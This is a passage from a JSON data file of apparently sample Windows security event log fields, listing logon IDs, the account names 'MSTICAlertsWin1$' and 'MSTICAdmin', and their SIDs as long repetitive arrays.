ac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\"],\"SubjectUserName\":[\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\"],\"SubjectUserSid\":[\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\"],\"TargetLogonId\":[\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0xfaac27\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x